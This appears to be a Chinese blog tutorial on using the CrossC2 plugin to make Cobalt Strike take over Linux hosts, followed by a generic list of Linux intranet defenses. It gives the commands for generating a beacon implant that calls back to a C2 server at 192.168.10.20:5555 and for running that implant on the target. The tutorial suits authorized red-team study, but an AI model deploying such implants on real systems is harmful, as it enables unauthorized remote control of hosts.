内网渗透—Linux上线

1. 前言

  默认情况下CS是不支持上线Linux的,只支持上线Windows,但是再事情的渗透测试过程中,一般企业重用的业务通常都是运行再Linux上的,这就会导致原版的CS无法上线Linux,而这时候可以使用crossC2插件来解决这个问题。

2. 下载插件

  crossC2主要面向企业自身及红队人员的安全评估框架,支持CobaltStrike对其他平台(Linux/MacOS/…)的安全评估,支持自定义模块,及包含一些常用的渗透模块。

  crossC2插件

  这里我们需要下载两个文件,主要其中Linux与MacOS是需要根据自己的服务器系统来判断,通常来说都是使用Linux系统。

在这里插入图片描述

3. CS配置

  这里我们首先先启动CS,这一步想必应该不需要解释吧!

3.1. 客户端配置

3.1.1. 导入插件文件

  将下载好的后缀为.cna文件导入进CS中。

在这里插入图片描述

3.1.2. 配置监听

  由于插件只支持HTTPS与TCP,所以这里我们选择的监听就选择HTTPS吧。

在这里插入图片描述

3.2. 服务端配置

3.2.1. 导入配置文件

  这里将下载下来的结尾是.Linux的文件导入到服务器中,注意需要导入到CS目录下,并赋予执行权限。

chmod +x genCrossC2.Linux

在这里插入图片描述

  这里最好的将CS客户端重启一次。

3.3. 生成木马

  当在之前加载插件后,就会出现这个CroseC2了,只不过建议,当将.Linux文件上传到服务端并添加执行权限后,最好是重启以下CS客户端。

  这里我们选择HTTPS的选项。

在这里插入图片描述

  这里相关的内容看图片上的文字,生成情况,会在会话事件日志中出现,确实这个点击生成后,并会直接像CS一样弹窗出来,而且是需要你去执行命令去生成。

  所以一般情况下可以不使用这个界面去生成,可以直接使用命令。

./genCrossC2.Linux 192.168.10.20 5555 ./.cobaltstrike.beacon_keys null Linux x64 t_cc2.out

这个命令其实仔细看是能够看出来的的前面的是我们之前上传到服务端的.Linux文件,后面跟着服务器地址及监听端口。
后面./.cobaltstrike.beacon_keys 输入ls -l 能够看到隐藏文件,后面的想必不用介绍了吧。

  当然如果觉得命令麻烦,那么就是直接在下面的图片中点击生成,然后将命令复制到Linux中进行执行,因为不一定能够执行成功!!

在这里插入图片描述

3.3.1. 修改cna文件

  当你点击生成后会发现,命令无法执行?这是由于在cna文件中的配置并没有修改,看下图,还是mac的。这时候我们就需要去修改cna文件。

在这里插入图片描述

  找到cna文件,也就是之前加载的文件,修改里面的地址,地址是你cs文件夹,下面的是你的系统文件,也就是刚刚下载的.Linux文件名字,其它的是不需要修改的。

  修改后,要将CS客户端重启哦。

在这里插入图片描述

3.3.2. 修改后效果

  可以看到前后的对比,前面有相应的路径了。

在这里插入图片描述

  然后将命令输入到Linux中进行执行,当然我的建议是在cs目录下执行,去除前面的绝对路径。

./genCrossC2.Linux 192.168.10.20 5555 ./.cobaltstrike.beacon_keys null Linux x64 t_cc2.out

在这里插入图片描述

3.4. 执行木马

  将木马上传到Linux系统中,然后基于执行权限,并且执行木马,从CS客户端可以看到成功上线。

chmod +x t_cc2.out
./t_cc2.out

在这里插入图片描述

  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
Linux系统中进行内网渗透,攻击者可以利用一些常见的工具和技术来获取未授权访问、提权或控制其他主机。以下是一些常见的内网渗透技术和建议的对策: 1. 弱密码攻击:攻击者可能尝试猜测或暴力破解Linux系统上的密码。对策:确保使用强密码策略,并定期更改密码。禁用不必要的远程登录方式,如SSH密码登录,改为使用公钥身份验证。 2. 服务漏洞利用:攻击者可能利用Linux系统上运行的服务中的已知漏洞进行入侵。对策:定期更新和升级系统和软件包,及时修补已知漏洞。关闭不必要的服务或端口,只保留所需的服务,并根据需要配置防火墙规则。 3. 提权攻击:攻击者可能试图通过利用Linux系统上的特权升级漏洞来获取管理员权限。对策:限制用户的权限,确保每个用户只具有适当的权限。定期检查系统日志,监测异常行为和特权升级尝试。及时安装操作系统和内核的安全更新。 4. 社交工程:攻击者可能使用欺骗、伪装或其他手段来获取用户的敏感信息。对策:加强安全意识培训,教育员工有关社会工程学攻击的风险和防范措施。提醒用户不要随意点击可疑的链接或打开未知来源的附件。 5. 无线网络攻击:如果目标网络中有无线网络,攻击者可能尝试通过无线网络入侵内部网络。对策:使用强密码和加密协议保护无线网络。禁用不必要的无线网络功能,并配置合适的防火墙规则。 6. 内部系统扫描:攻击者可能在内网中进行系统扫描,探测其他主机的漏洞。对策:配置入侵检测系统(IDS)或入侵防御系统(IPS),监测内部网络流量,及时发现和阻止异常活动。 请注意,这些建议只是一些基本的防范措施。实际情况可能因网络环境和需求而异。为了确保Linux系统的安全,建议定期进行漏洞扫描、安全审计和渗透测试,并采取相应的安全措施来减少潜在的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

剁椒鱼头没剁椒

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值